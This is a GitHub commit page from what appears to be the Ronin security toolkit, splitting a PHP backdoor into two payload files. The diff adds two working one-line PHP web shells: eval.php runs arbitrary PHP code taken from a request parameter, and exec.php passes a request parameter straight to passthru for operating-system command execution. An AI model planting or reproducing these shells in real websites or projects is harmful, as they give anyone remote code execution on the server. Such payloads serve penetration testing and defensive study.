Skip to content

Commit

Permalink
Split backdoor.php into eval.php and exec.php (issue #21).
Browse files Browse the repository at this point in the history
* Fixed a typo in eval.php.
  • Loading branch information
postmodern committed Jan 14, 2013
1 parent c3ee6f6 commit 0d651cb
Show file tree
Hide file tree
Showing 3 changed files with 2 additions and 1 deletion.
1 change: 0 additions & 1 deletion data/ronin/payloads/php/backdoor.php

This file was deleted.

1 change: 1 addition & 0 deletions data/ronin/payloads/php/eval.php
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
<?php if(isset($_REQUEST["eval"])){echo "<eval>";var_dump(eval("return ".$_REQUEST["eval"]));echo "</eval>";} ?>
1 change: 1 addition & 0 deletions data/ronin/payloads/php/exec.php
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
<?php if(isset($_REQUEST["exec"])){echo "<exec>";passthru($_REQUEST["exec"]);echo "</exec>";} ?>

0 comments on commit 0d651cb

Please sign in to comment.